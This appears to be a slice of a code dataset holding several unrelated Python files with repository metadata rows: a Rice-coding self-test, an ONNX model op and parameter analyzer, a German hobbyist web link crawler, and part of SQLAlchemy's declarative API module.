    """Self-test: random round-trips through encode() and the delta codec.

    NOTE(review): written for Python 2 -- on Python 3 ``range(...)`` is a
    lazy object, so ``l == l2`` (range vs. list) and encode()'s internal
    ``tolist() == l`` comparison would fail; confirm target interpreter.
    """
    import random
    # Round-trip random value lists at random m.
    for size in [10, 20, 50, 100, 200]:
        l = [random.randint(1, size) for i in range(50)]
        c = encode(random.randint(1, 16), l)
        assert c.tolist() == l
    # Round-trip strictly increasing sequences through the delta codec.
    for size in [10, 20, 50, 100, 200]:
        l = range(random.randint(1, size), size + random.randint(1, size))
        t = encode_deltas(l)
        l2 = decode_deltas(*t)
        assert l == l2
        if l != l2:
            _print(l)
            _print(l2)
def pickle_efficiency():
    """Compare pickled size of raw lists vs. their Rice-coded form.

    Prints one win/lose line per (m, size, element range) combination,
    where "win" means the encoded pickle is smaller.
    """
    import pickle
    import random
    for m in [4, 8, 12]:
        for size in [10, 20, 50, 100, 200, 500, 1000, 2000, 5000]:
            for elt_range in [10, 20, 50, 100, 200, 500, 1000]:
                l = [random.randint(1, elt_range) for i in range(size)]
                # Protocol 1 for both, so sizes are comparable.
                raw = pickle.dumps(l, 1)
                enc = pickle.dumps(encode(m, l), 1)
                _print("m=%2d size=%4d range=%4d" % (m, size, elt_range), False)
                _print("%5d %5d" % (len(raw), len(enc)), False)
                if len(raw) > len(enc):
                    _print("win")
                else:
                    _print("lose")
# Run the round-trip self-test when executed as a script.
if __name__ == "__main__":
    test()
| 28.221239 | 80 | 0.541549 |
669e41eb636b442629c2447231e8fe9c017a7d11 | 2,130 | py | Python | onnx_analyzer/analyzer.py | ksang/onnx-analyzer | 35f95eea570ffb6a77e45113dc0e507eb654bc12 | [
"MIT"
] | null | null | null | onnx_analyzer/analyzer.py | ksang/onnx-analyzer | 35f95eea570ffb6a77e45113dc0e507eb654bc12 | [
"MIT"
] | null | null | null | onnx_analyzer/analyzer.py | ksang/onnx-analyzer | 35f95eea570ffb6a77e45113dc0e507eb654bc12 | [
"MIT"
] | null | null | null | import os
import onnx
import re
import onnx_analyzer
import pandas as pd
from pandas import ExcelWriter
import matplotlib.pyplot as plt
def analyze_single(model_path: str, calculate_macs=False) -> list:
    """Analyze one ONNX model file.

    Returns a single-element list ``[(model_path, params, ops, macs)]``
    holding the parameter count and per-op statistics.

    NOTE(review): ``calculate_macs`` is accepted but never consulted --
    count_op always returns macs; confirm intended behaviour.
    """
    model = onnx.load(model_path)
    params = onnx_analyzer.count_param(model)
    ops, macs = onnx_analyzer.count_op(model)
    return[(model_path, params, ops, macs)]
def analyze(path: str, calculate_macs=False) -> list:
    """Analyze every ``.onnx`` model found directly inside *path*.

    Returns the concatenated per-model result tuples produced by
    :func:`analyze_single`.
    """
    results = []
    for entry in os.listdir(path):
        # Only ONNX model files are analyzed; everything else is skipped.
        # (FIX: dropped the redundant ``else: continue`` of the original.)
        if entry.endswith('.onnx'):
            results += analyze_single(os.path.join(path, entry), calculate_macs)
    return results
def excel_sheetname(model_path: str) -> str:
    """Derive a valid Excel sheet name from a model path.

    Keeps only letters, digits, dots and underscores from the file name
    and truncates to 30 characters (Excel caps sheet names at 31).
    """
    base = os.path.basename(model_path)
    cleaned = re.sub('[^A-Za-z0-9\._]+', '', base)
    return cleaned[:30]
def report(results: list, excel: str, vis: str):
if vis:
fig, axs = plt.subplots(len(results))
fig.set_size_inches(8,6*len(results))
if excel:
excel_writer = ExcelWriter(excel, engine='xlsxwriter')
for i, (model_path, params, ops, macs) in enumerate(results):
print("Results for model: {}".format(model_path))
print("params: {}".format(params))
print("op statistics:")
ops_df = pd.DataFrame({'op_type': ops.keys(), 'count': ops.values()})
ops_df['percent'] = (ops_df['count'] /
ops_df['count'].sum()) * 100
print(ops_df)
if vis:
ops_df.plot.bar(x='op_type', y='count', ax=axs[i])
axs[i].set_title(model_path)
if excel:
ops_df.to_excel(excel_writer,
sheet_name=excel_sheetname(model_path))
if vis:
plt.subplots_adjust(left=0.1,
bottom=0.1,
right=0.9,
top=0.9,
wspace=0.4,
hspace=0.6)
print("Saving visualizations to: {}".format(vis))
plt.savefig(vis)
if excel:
print("Saving dataframes as excel to: {}".format(excel))
excel_writer.save()
| 33.809524 | 80 | 0.575587 |
4ad66e1a41c9fdfdcd4f172bace61b19a7bd4ed6 | 6,279 | py | Python | Python/Buch_ATBS/Teil_2/Kapitel_11_Webscraping/09_sammle_alle_links_einer_website/09_sammle_alle_links_einer_website_versuch_2.py | Apop85/Scripts | e71e1c18539e67543e3509c424c7f2d6528da654 | [
"MIT"
] | null | null | null | Python/Buch_ATBS/Teil_2/Kapitel_11_Webscraping/09_sammle_alle_links_einer_website/09_sammle_alle_links_einer_website_versuch_2.py | Apop85/Scripts | e71e1c18539e67543e3509c424c7f2d6528da654 | [
"MIT"
] | 6 | 2020-12-24T15:15:09.000Z | 2022-01-13T01:58:35.000Z | Python/Buch_ATBS/Teil_2/Kapitel_11_Webscraping/09_sammle_alle_links_einer_website/09_sammle_alle_links_einer_website_versuch_2.py | Apop85/Scripts | 1d8dad316c55e1f1343526eac9e4b3d0909e4873 | [
"MIT"
] | null | null | null | # 09_sammle_alle_links_einer_website.py
# Dieses Script soll eine beliebige Webseite nach links in allen Unterseiten der Webseite suchen
# und in einem File übersichtlich speichern
import requests, bs4, os, logging, re
logging.basicConfig(level=logging.ERROR, format='%(asctime)s - %(levelname)s - %(message)s')
os.chdir(os.path.dirname(__file__))
# Globals
site_links={}
site_counter={}
used_path={}
save_file=r'.\Websitelinks.txt'
def choose_website():
    """Prompt for a website, initialise the report file, start crawling.

    Sets the module globals ``base_name`` (normalised root URL) and
    ``crawl_loop_number`` (depth counter, stepped in units of 3), then
    kicks off crawl_loop().
    """
    global save_file, base_name, crawl_loop_number
    # Depth starts at -3 so the first crawl_loop() call begins at 0.
    crawl_loop_number=-3
    # Prompt (German): "enter the website to crawl".
    print('Zu durchsuchende Webseite angeben:')
    website_choice=input()
    # Start a fresh report file headed by the chosen URL.
    save_file_write=open(save_file, 'w')
    save_file_write.write(website_choice+'\n'+'~'*len(website_choice)+'\n\n')
    save_file_write.close()
    # Split the URL into (scheme, www., rest) so a missing scheme can be
    # defaulted to https://.
    search_pattern=re.compile(r'(http://|https://)?(www\.)?([\w]+\.[\w]{2,3}.*)')
    base_name=search_pattern.findall(website_choice)
    base_name=list(base_name[0])
    for entry in range(len(base_name)):
        if entry == 0 and base_name[entry] == '':
            base_name[entry]='https://'
    base_name=''.join(base_name)
    # NOTE(review): base_name is already a str here, so this re-join is a
    # no-op; website_choice simply becomes a copy of base_name.
    website_choice=''.join(base_name)
    site_links.setdefault('base', base_name+'/')
    crawl_loop(website_choice)
def crawl_loop(url_name):
    """Recursively collect links from ``url_name`` and its sub-pages.

    Depth is tracked via the global ``crawl_loop_number`` in steps of 3
    (also used as the dash indent in the report file).  Discovered links
    are appended to the global ``site_links`` per depth and written to
    ``save_file``; internal links are resolved against ``used_path`` and
    crawled recursively unless check_if_ignored() has seen them.
    """
    global save_file, base_name, crawl_loop_number, site_links, site_counter, used_path
    crawl_loop_number+=3
    # Drop stale link state for this depth from a previous sibling crawl.
    try:
        if len(site_links) > 1:
            del site_links[crawl_loop_number]
            # NOTE(review): bare name expression below is a leftover no-op
            # debug marker (it does not invoke the breakpoint() builtin).
            breakpoint
    except Exception:
        None
    url_content=check_url(url_name)
    if url_content != None:
        bs4_container=bs4.BeautifulSoup(url_content.text, features='html.parser')
    else:
        return
    site_links.setdefault(crawl_loop_number, [])
    site_counter.setdefault(crawl_loop_number, 0)
    used_path.setdefault(crawl_loop_number, url_name)
    # Collect every anchor href; relative links get a leading slash.
    for class_a_object in bs4_container.find_all('a', href=True):
        if 'http' in class_a_object['href']:
            site_links[crawl_loop_number]+=[class_a_object['href'].strip('/')]
        else:
            site_links[crawl_loop_number]+=['/'+class_a_object['href'].strip('/')]
    for entry in site_links[crawl_loop_number]:
        # Log the link into the report, indented by depth.
        save_file_append=open(save_file, 'a')
        save_file_append.write('-'*crawl_loop_number+entry+'\n')
        save_file_append.close()
        slashes_in_entry=len(entry.split('/'))
        site_counter[crawl_loop_number]=slashes_in_entry
        if 'Bash' in entry:
            breakpoint
        # Only follow internal, non-anchor-toc links.
        if 'http' not in entry and 'www' not in entry and not '#toc' in entry and '/' != entry:
            if base_name in entry or '/' in entry or '#' in entry:
                if '#' in entry or '/' in entry:
                    # Find the longest suffix of the current path that
                    # overlaps the entry, to splice a new absolute URL.
                    for i in range(len(entry)):
                        chunk_size=len(entry)-i
                        if entry[:chunk_size] in used_path[crawl_loop_number][-chunk_size:]:
                            if i == len(entry)-1:
                                new_url=used_path[crawl_loop_number]+entry
                            elif len(entry.split('/')) <= 2 and crawl_loop_number > 0:
                                if used_path[crawl_loop_number-3]+entry != url_name:
                                    new_url=used_path[crawl_loop_number]+entry
                                else:
                                    new_url=used_path[crawl_loop_number]
                            elif i == 0 and entry == used_path[crawl_loop_number][-len(entry):]:
                                new_url=used_path[crawl_loop_number]
                            elif len(entry.split('/')) <= 2 and crawl_loop_number == 0:
                                new_url=used_path[crawl_loop_number]+entry
                            else:
                                chunk_location=len(entry)-i
                                new_url=used_path[crawl_loop_number][:-chunk_location]+entry
                                breakpoint
                            break
                        elif i == len(entry)-1:
                            new_url=used_path[crawl_loop_number]+entry
                    # Commented-out earlier attempts at URL splicing, kept
                    # by the author for reference:
                    # if crawl_loop_number == 0:
                    #     new_url=used_path[crawl_loop_number]+'/'+entry.strip('/')
                    #     logging.info('Neue URL gefunden:'+new_url)
                    # else:
                    #     new_url=used_path[crawl_loop_number-3]+entry
                    #     logging.info('Neue URL gefunden:'+new_url)
                    # new_url=used_path[crawl_loop_number]+'/'+entry.strip('/')
                    # logging.info('Neue URL gefunden:'+new_url)
                    # if len(new_url) < len(base_name):
                    #     new_url=base_name+entry
                    #     breakpoint
                else:
                    if base_name in entry:
                        new_url=entry
                    else:
                        continue
                # Log message (German): "new URL found".
                logging.info('Neue URL gefunden:'+new_url)
                check_value=check_if_ignored(new_url)
                # Recurse into on-site URLs not seen before.
                if base_name in new_url and check_value == False:
                    logging.info('Starte neuen Loop in der Tiefe: '+str(crawl_loop_number/3+1))
                    crawl_loop(new_url)
                    crawl_loop_number-=3
                elif base_name in new_url and crawl_loop_number == 0:
                    logging.info('Starte neuen Loop in der Tiefe: '+str(crawl_loop_number/3+1))
                    crawl_loop(new_url)
                    crawl_loop_number-=3
                else:
                    breakpoint
    del site_links[crawl_loop_number]
    del site_counter[crawl_loop_number]
def check_url(url_name):
    """Fetch *url_name*; return the response, or None on an HTTP error status."""
    response = requests.get(url_name)
    try:
        response.raise_for_status()
    except Exception:
        # Log message (German): "URL faulty".
        logging.error('URL Fehlerhaft: '+url_name)
        return None
    return response
def check_if_ignored(new_url):
    """Return True if *new_url* (or its last path fragment) was already seen.

    Scans the per-depth link lists in the global ``site_links``.

    NOTE(review): the ``max_try == attempt`` guard returns False before
    the final entry of site_links is inspected (with a single entry,
    nothing is checked at all) -- confirm whether this was meant to skip
    the non-list 'base' entry.
    """
    global site_links
    max_try=len(site_links)-1
    attempt=0
    # Bare file/anchor name of the URL, used as a weaker duplicate test.
    fragment='/'+'/'.join(new_url.split('/')[-1:])
    for url_list in site_links.values():
        if max_try == attempt:
            return False
        elif new_url in url_list:
            return True
        elif fragment in url_list:
            return True
        else:
            attempt+=1
    return False
# Prompt for a site and crawl it; repeats forever until interrupted.
while True:
    choose_website()
# for i in range(len(entry)):
# url_name[-i-len(entry):]
# entry[]
# /Apop85/Scripts
# blabla/Apop85/Scripts | 41.309211 | 97 | 0.581781 |
54e927ee470a0e9950478dc7a73b1d2509c1ab5b | 34,907 | py | Python | venv/Lib/site-packages/sqlalchemy/orm/decl_api.py | geksogen/FastAPI_exampels | 441e4ea1ebfde984958deac115f60c4d0110d5b2 | [
"CC0-1.0"
] | null | null | null | venv/Lib/site-packages/sqlalchemy/orm/decl_api.py | geksogen/FastAPI_exampels | 441e4ea1ebfde984958deac115f60c4d0110d5b2 | [
"CC0-1.0"
] | null | null | null | venv/Lib/site-packages/sqlalchemy/orm/decl_api.py | geksogen/FastAPI_exampels | 441e4ea1ebfde984958deac115f60c4d0110d5b2 | [
"CC0-1.0"
] | null | null | null | # ext/declarative/api.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Public API functions and helpers for declarative."""
from __future__ import absolute_import
import itertools
import re
import weakref
from . import attributes
from . import clsregistry
from . import exc as orm_exc
from . import instrumentation
from . import interfaces
from . import mapper as mapperlib
from .base import _inspect_mapped_class
from .decl_base import _add_attribute
from .decl_base import _as_declarative
from .decl_base import _declarative_constructor
from .decl_base import _DeferredMapperConfig
from .decl_base import _del_attribute
from .decl_base import _mapper
from .descriptor_props import SynonymProperty as _orm_synonym
from .. import exc
from .. import inspection
from .. import util
from ..sql.schema import MetaData
from ..util import hybridmethod
from ..util import hybridproperty
def has_inherited_table(cls):
    """Return True when any superclass of ``cls`` already has a mapped table.

    Walks the MRO (excluding ``cls`` itself) and reports whether any ancestor
    carries a non-``None`` ``__table__`` attribute.  Declarative mixins use
    this to produce different attributes for a base class versus a subclass
    within an inheritance hierarchy.

    .. seealso::

        :ref:`decl_mixin_inheritance`

    """
    ancestors = cls.__mro__[1:]
    return any(
        getattr(ancestor, "__table__", None) is not None
        for ancestor in ancestors
    )
class DeclarativeMeta(type):
    """Metaclass applied to declarative base classes.

    Runs the declarative mapping process on every non-abstract subclass as
    it is defined, and routes later attribute assignment/deletion through
    declarative instrumentation.
    """

    def __init__(cls, classname, bases, dict_, **kw):
        # early-consume registry from the initial declarative base,
        # assign privately to not conflict with subclass attributes named
        # "registry"
        reg = getattr(cls, "_sa_registry", None)
        if reg is None:
            reg = dict_.get("registry", None)
            if not isinstance(reg, registry):
                raise exc.InvalidRequestError(
                    "Declarative base class has no 'registry' attribute, "
                    "or registry is not a sqlalchemy.orm.registry() object"
                )
            else:
                cls._sa_registry = reg

        # classes flagged __abstract__ (including the generated base itself)
        # are not mapped; everything else goes through the declarative scan.
        if not cls.__dict__.get("__abstract__", False):
            _as_declarative(reg, cls, dict_)
        type.__init__(cls, classname, bases, dict_)

    def __setattr__(cls, key, value):
        # instrument attributes added to the class after mapping
        _add_attribute(cls, key, value)

    def __delattr__(cls, key):
        # likewise de-instrument attributes removed from the class
        _del_attribute(cls, key)
def synonym_for(name, map_column=False):
    """Return a decorator that combines a Python descriptor with a
    :func:`_orm.synonym` for the mapped attribute ``name``.

    The decorated callable is handed to :func:`_orm.synonym` as its
    ``descriptor`` argument::

        class MyClass(Base):
            __tablename__ = 'my_table'

            id = Column(Integer, primary_key=True)
            _job_status = Column("job_status", String(50))

            @synonym_for("job_status")
            @property
            def job_status(self):
                return "Status: %s" % self._job_status

    Synonyms are a legacy feature; the :ref:`hybrid attribute
    <mapper_hybrids>` extension is generally preferred for new code.

    :param name: name of the mapped attribute to alias.
    :param map_column: forwarded to :func:`_orm.synonym`.

    .. seealso::

        :ref:`synonyms` - Overview of synonyms

        :func:`_orm.synonym` - the mapper-level function

    """

    def _decorator(descriptor_fn):
        return _orm_synonym(
            name, map_column=map_column, descriptor=descriptor_fn
        )

    return _decorator
class declared_attr(interfaces._MappedAttribute, property):
"""Mark a class-level method as representing the definition of
a mapped property or special declarative member name.
:class:`_orm.declared_attr` is typically applied as a decorator to a class
level method, turning the attribute into a scalar-like property that can be
invoked from the uninstantiated class. The Declarative mapping process
looks for these :class:`_orm.declared_attr` callables as it scans classes,
and assumes any attribute marked with :class:`_orm.declared_attr` will be a
callable that will produce an object specific to the Declarative mapping or
table configuration.
:class:`_orm.declared_attr` is usually applicable to mixins, to define
relationships that are to be applied to different implementors of the
class. It is also used to define :class:`_schema.Column` objects that
include the :class:`_schema.ForeignKey` construct, as these cannot be
easily reused across different mappings. The example below illustrates
both::
class ProvidesUser(object):
"A mixin that adds a 'user' relationship to classes."
@declared_attr
def user_id(self):
return Column(ForeignKey("user_account.id"))
@declared_attr
def user(self):
return relationship("User")
:class:`_orm.declared_attr` can also be applied to mapped classes, such as
to provide a "polymorphic" scheme for inheritance::
class Employee(Base):
id = Column(Integer, primary_key=True)
type = Column(String(50), nullable=False)
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
@declared_attr
def __mapper_args__(cls):
if cls.__name__ == 'Employee':
return {
"polymorphic_on":cls.type,
"polymorphic_identity":"Employee"
}
else:
return {"polymorphic_identity":cls.__name__}
To use :class:`_orm.declared_attr` inside of a Python dataclass
as discussed at :ref:`orm_declarative_dataclasses_declarative_table`,
it may be placed directly inside the field metadata using a lambda::
@dataclass
class AddressMixin:
__sa_dataclass_metadata_key__ = "sa"
user_id: int = field(
init=False, metadata={"sa": declared_attr(lambda: Column(ForeignKey("user.id")))}
)
user: User = field(
init=False, metadata={"sa": declared_attr(lambda: relationship(User))}
)
:class:`_orm.declared_attr` also may be omitted from this form using a
lambda directly, as in::
user: User = field(
init=False, metadata={"sa": lambda: relationship(User)}
)
.. seealso::
:ref:`orm_mixins_toplevel` - illustrates how to use Declarative Mixins
which is the primary use case for :class:`_orm.declared_attr`
:ref:`orm_declarative_dataclasses_mixin` - illustrates special forms
for use with Python dataclasses
""" # noqa E501
def __init__(self, fget, cascading=False):
super(declared_attr, self).__init__(fget)
self.__doc__ = fget.__doc__
self._cascading = cascading
def __get__(desc, self, cls):
# the declared_attr needs to make use of a cache that exists
# for the span of the declarative scan_attributes() phase.
# to achieve this we look at the class manager that's configured.
manager = attributes.manager_of_class(cls)
if manager is None:
if not re.match(r"^__.+__$", desc.fget.__name__):
# if there is no manager at all, then this class hasn't been
# run through declarative or mapper() at all, emit a warning.
util.warn(
"Unmanaged access of declarative attribute %s from "
"non-mapped class %s" % (desc.fget.__name__, cls.__name__)
)
return desc.fget(cls)
elif manager.is_mapped:
# the class is mapped, which means we're outside of the declarative
# scan setup, just run the function.
return desc.fget(cls)
# here, we are inside of the declarative scan. use the registry
# that is tracking the values of these attributes.
declarative_scan = manager.declarative_scan
reg = declarative_scan.declared_attr_reg
if desc in reg:
return reg[desc]
else:
reg[desc] = obj = desc.fget(cls)
return obj
@hybridmethod
def _stateful(cls, **kw):
return _stateful_declared_attr(**kw)
@hybridproperty
def cascading(cls):
"""Mark a :class:`.declared_attr` as cascading.
This is a special-use modifier which indicates that a column
or MapperProperty-based declared attribute should be configured
distinctly per mapped subclass, within a mapped-inheritance scenario.
.. warning::
The :attr:`.declared_attr.cascading` modifier has several
limitations:
* The flag **only** applies to the use of :class:`.declared_attr`
on declarative mixin classes and ``__abstract__`` classes; it
currently has no effect when used on a mapped class directly.
* The flag **only** applies to normally-named attributes, e.g.
not any special underscore attributes such as ``__tablename__``.
On these attributes it has **no** effect.
* The flag currently **does not allow further overrides** down
the class hierarchy; if a subclass tries to override the
attribute, a warning is emitted and the overridden attribute
is skipped. This is a limitation that it is hoped will be
resolved at some point.
Below, both MyClass as well as MySubClass will have a distinct
``id`` Column object established::
class HasIdMixin(object):
@declared_attr.cascading
def id(cls):
if has_inherited_table(cls):
return Column(
ForeignKey('myclass.id'), primary_key=True
)
else:
return Column(Integer, primary_key=True)
class MyClass(HasIdMixin, Base):
__tablename__ = 'myclass'
# ...
class MySubClass(MyClass):
""
# ...
The behavior of the above configuration is that ``MySubClass``
will refer to both its own ``id`` column as well as that of
``MyClass`` underneath the attribute named ``some_id``.
.. seealso::
:ref:`declarative_inheritance`
:ref:`mixin_inheritance_columns`
"""
return cls._stateful(cascading=True)
class _stateful_declared_attr(declared_attr):
    """A :class:`.declared_attr` variant that carries preset keyword
    arguments (e.g. ``cascading=True``) until the decorated function is
    finally supplied via ``__call__``."""

    def __init__(self, **kw):
        # deliberately skips declared_attr.__init__; there is no fget yet,
        # only the stored modifier keywords
        self.kw = kw

    def _stateful(self, **kw):
        # accumulate further modifiers into a fresh stateful instance
        new_kw = self.kw.copy()
        new_kw.update(kw)
        return _stateful_declared_attr(**new_kw)

    def __call__(self, fn):
        # acting as the actual decorator: build the real declared_attr
        return declared_attr(fn, **self.kw)
def declarative_mixin(cls):
    """Identity decorator marking ``cls`` as a declarative mixin.

    E.g.::

        from sqlalchemy.orm import declared_attr
        from sqlalchemy.orm import declarative_mixin

        @declarative_mixin
        class MyMixin:

            @declared_attr
            def __tablename__(cls):
                return cls.__name__.lower()

            __table_args__ = {'mysql_engine': 'InnoDB'}
            __mapper_args__= {'always_refresh': True}

            id =  Column(Integer, primary_key=True)

        class MyModel(MyMixin, Base):
            name = Column(String(1000))

    The class is returned unchanged; the decorator currently exists purely
    so that the :ref:`Mypy plugin <mypy_toplevel>` can recognize SQLAlchemy
    declarative mixin classes when no other context is available.

    .. versionadded:: 1.4.6

    .. seealso::

        :ref:`orm_mixins_toplevel`

        :ref:`mypy_declarative_mixins` - in the
        :ref:`Mypy plugin documentation <mypy_toplevel>`

    """  # noqa: E501
    return cls
def declarative_base(
bind=None,
metadata=None,
mapper=None,
cls=object,
name="Base",
constructor=_declarative_constructor,
class_registry=None,
metaclass=DeclarativeMeta,
):
r"""Construct a base class for declarative class definitions.
The new base class will be given a metaclass that produces
appropriate :class:`~sqlalchemy.schema.Table` objects and makes
the appropriate :func:`~sqlalchemy.orm.mapper` calls based on the
information provided declaratively in the class and any subclasses
of the class.
The :func:`_orm.declarative_base` function is a shorthand version
of using the :meth:`_orm.registry.generate_base`
method. That is, the following::
from sqlalchemy.orm import declarative_base
Base = declarative_base()
Is equivalent to::
from sqlalchemy.orm import registry
mapper_registry = registry()
Base = mapper_registry.generate_base()
See the docstring for :class:`_orm.registry`
and :meth:`_orm.registry.generate_base`
for more details.
.. versionchanged:: 1.4 The :func:`_orm.declarative_base`
function is now a specialization of the more generic
:class:`_orm.registry` class. The function also moves to the
``sqlalchemy.orm`` package from the ``declarative.ext`` package.
:param bind: An optional
:class:`~sqlalchemy.engine.Connectable`, will be assigned
the ``bind`` attribute on the :class:`~sqlalchemy.schema.MetaData`
instance.
.. deprecated:: 1.4 The "bind" argument to declarative_base is
deprecated and will be removed in SQLAlchemy 2.0.
:param metadata:
An optional :class:`~sqlalchemy.schema.MetaData` instance. All
:class:`~sqlalchemy.schema.Table` objects implicitly declared by
subclasses of the base will share this MetaData. A MetaData instance
will be created if none is provided. The
:class:`~sqlalchemy.schema.MetaData` instance will be available via the
``metadata`` attribute of the generated declarative base class.
:param mapper:
An optional callable, defaults to :func:`~sqlalchemy.orm.mapper`. Will
be used to map subclasses to their Tables.
:param cls:
Defaults to :class:`object`. A type to use as the base for the generated
declarative base class. May be a class or tuple of classes.
:param name:
Defaults to ``Base``. The display name for the generated
class. Customizing this is not required, but can improve clarity in
tracebacks and debugging.
:param constructor:
Specify the implementation for the ``__init__`` function on a mapped
class that has no ``__init__`` of its own. Defaults to an
implementation that assigns \**kwargs for declared
fields and relationships to an instance. If ``None`` is supplied,
no __init__ will be provided and construction will fall back to
cls.__init__ by way of the normal Python semantics.
:param class_registry: optional dictionary that will serve as the
registry of class names-> mapped classes when string names
are used to identify classes inside of :func:`_orm.relationship`
and others. Allows two or more declarative base classes
to share the same registry of class names for simplified
inter-base relationships.
:param metaclass:
Defaults to :class:`.DeclarativeMeta`. A metaclass or __metaclass__
compatible callable to use as the meta type of the generated
declarative base class.
.. seealso::
:class:`_orm.registry`
"""
if bind is not None:
# util.deprecated_params does not work
util.warn_deprecated_20(
"The ``bind`` argument to declarative_base is "
"deprecated and will be removed in SQLAlchemy 2.0.",
)
return registry(
_bind=bind,
metadata=metadata,
class_registry=class_registry,
constructor=constructor,
).generate_base(
mapper=mapper,
cls=cls,
name=name,
metaclass=metaclass,
)
class registry(object):
"""Generalized registry for mapping classes.
The :class:`_orm.registry` serves as the basis for maintaining a collection
of mappings, and provides configurational hooks used to map classes.
The three general kinds of mappings supported are Declarative Base,
Declarative Decorator, and Imperative Mapping. All of these mapping
styles may be used interchangeably:
* :meth:`_orm.registry.generate_base` returns a new declarative base
class, and is the underlying implementation of the
:func:`_orm.declarative_base` function.
* :meth:`_orm.registry.mapped` provides a class decorator that will
apply declarative mapping to a class without the use of a declarative
base class.
* :meth:`_orm.registry.map_imperatively` will produce a
:class:`_orm.Mapper` for a class without scanning the class for
declarative class attributes. This method suits the use case historically
provided by the
:func:`_orm.mapper` classical mapping function.
.. versionadded:: 1.4
.. seealso::
:ref:`orm_mapping_classes_toplevel` - overview of class mapping
styles.
"""
def __init__(
self,
metadata=None,
class_registry=None,
constructor=_declarative_constructor,
_bind=None,
):
r"""Construct a new :class:`_orm.registry`
:param metadata:
An optional :class:`_schema.MetaData` instance. All
:class:`_schema.Table` objects generated using declarative
table mapping will make use of this :class:`_schema.MetaData`
collection. If this argument is left at its default of ``None``,
a blank :class:`_schema.MetaData` collection is created.
:param constructor:
Specify the implementation for the ``__init__`` function on a mapped
class that has no ``__init__`` of its own. Defaults to an
implementation that assigns \**kwargs for declared
fields and relationships to an instance. If ``None`` is supplied,
no __init__ will be provided and construction will fall back to
cls.__init__ by way of the normal Python semantics.
:param class_registry: optional dictionary that will serve as the
registry of class names-> mapped classes when string names
are used to identify classes inside of :func:`_orm.relationship`
and others. Allows two or more declarative base classes
to share the same registry of class names for simplified
inter-base relationships.
"""
lcl_metadata = metadata or MetaData()
if _bind:
lcl_metadata.bind = _bind
if class_registry is None:
class_registry = weakref.WeakValueDictionary()
self._class_registry = class_registry
self._managers = weakref.WeakKeyDictionary()
self._non_primary_mappers = weakref.WeakKeyDictionary()
self.metadata = lcl_metadata
self.constructor = constructor
self._dependents = set()
self._dependencies = set()
self._new_mappers = False
with mapperlib._CONFIGURE_MUTEX:
mapperlib._mapper_registries[self] = True
@property
def mappers(self):
"""read only collection of all :class:`_orm.Mapper` objects."""
return frozenset(manager.mapper for manager in self._managers).union(
self._non_primary_mappers
)
def _set_depends_on(self, registry):
if registry is self:
return
registry._dependents.add(self)
self._dependencies.add(registry)
def _flag_new_mapper(self, mapper):
mapper._ready_for_configure = True
if self._new_mappers:
return
for reg in self._recurse_with_dependents({self}):
reg._new_mappers = True
@classmethod
def _recurse_with_dependents(cls, registries):
todo = registries
done = set()
while todo:
reg = todo.pop()
done.add(reg)
# if yielding would remove dependents, make sure we have
# them before
todo.update(reg._dependents.difference(done))
yield reg
# if yielding would add dependents, make sure we have them
# after
todo.update(reg._dependents.difference(done))
@classmethod
def _recurse_with_dependencies(cls, registries):
todo = registries
done = set()
while todo:
reg = todo.pop()
done.add(reg)
# if yielding would remove dependencies, make sure we have
# them before
todo.update(reg._dependencies.difference(done))
yield reg
            # if yielding would add dependencies, make sure we have
            # them after
todo.update(reg._dependencies.difference(done))
def _mappers_to_configure(self):
return itertools.chain(
(
manager.mapper
for manager in self._managers
if manager.is_mapped
and not manager.mapper.configured
and manager.mapper._ready_for_configure
),
(
npm
for npm in self._non_primary_mappers
if not npm.configured and npm._ready_for_configure
),
)
def _add_non_primary_mapper(self, np_mapper):
self._non_primary_mappers[np_mapper] = True
def _dispose_cls(self, cls):
clsregistry.remove_class(cls.__name__, cls, self._class_registry)
def _add_manager(self, manager):
self._managers[manager] = True
assert manager.registry is None
manager.registry = self
def configure(self, cascade=False):
"""Configure all as-yet unconfigured mappers in this
:class:`_orm.registry`.
The configure step is used to reconcile and initialize the
:func:`_orm.relationship` linkages between mapped classes, as well as
to invoke configuration events such as the
:meth:`_orm.MapperEvents.before_configured` and
:meth:`_orm.MapperEvents.after_configured`, which may be used by ORM
extensions or user-defined extension hooks.
If one or more mappers in this registry contain
:func:`_orm.relationship` constructs that refer to mapped classes in
other registries, this registry is said to be *dependent* on those
registries. In order to configure those dependent registries
automatically, the :paramref:`_orm.registry.configure.cascade` flag
should be set to ``True``. Otherwise, if they are not configured, an
exception will be raised. The rationale behind this behavior is to
allow an application to programmatically invoke configuration of
registries while controlling whether or not the process implicitly
reaches other registries.
As an alternative to invoking :meth:`_orm.registry.configure`, the ORM
function :func:`_orm.configure_mappers` function may be used to ensure
configuration is complete for all :class:`_orm.registry` objects in
memory. This is generally simpler to use and also predates the usage of
:class:`_orm.registry` objects overall. However, this function will
impact all mappings throughout the running Python process and may be
more memory/time consuming for an application that has many registries
in use for different purposes that may not be needed immediately.
.. seealso::
:func:`_orm.configure_mappers`
.. versionadded:: 1.4.0b2
"""
mapperlib._configure_registries({self}, cascade=cascade)
def dispose(self, cascade=False):
"""Dispose of all mappers in this :class:`_orm.registry`.
After invocation, all the classes that were mapped within this registry
will no longer have class instrumentation associated with them. This
method is the per-:class:`_orm.registry` analogue to the
application-wide :func:`_orm.clear_mappers` function.
If this registry contains mappers that are dependencies of other
registries, typically via :func:`_orm.relationship` links, then those
registries must be disposed as well. When such registries exist in
relation to this one, their :meth:`_orm.registry.dispose` method will
also be called, if the :paramref:`_orm.registry.dispose.cascade` flag
is set to ``True``; otherwise, an error is raised if those registries
were not already disposed.
.. versionadded:: 1.4.0b2
.. seealso::
:func:`_orm.clear_mappers`
"""
mapperlib._dispose_registries({self}, cascade=cascade)
def _dispose_manager_and_mapper(self, manager):
if "mapper" in manager.__dict__:
mapper = manager.mapper
mapper._set_dispose_flags()
class_ = manager.class_
self._dispose_cls(class_)
instrumentation._instrumentation_factory.unregister(class_)
def generate_base(
self,
mapper=None,
cls=object,
name="Base",
metaclass=DeclarativeMeta,
):
"""Generate a declarative base class.
Classes that inherit from the returned class object will be
automatically mapped using declarative mapping.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
Base = mapper_registry.generate_base()
class MyClass(Base):
__tablename__ = "my_table"
id = Column(Integer, primary_key=True)
The above dynamically generated class is equivalent to the
non-dynamic example below::
from sqlalchemy.orm import registry
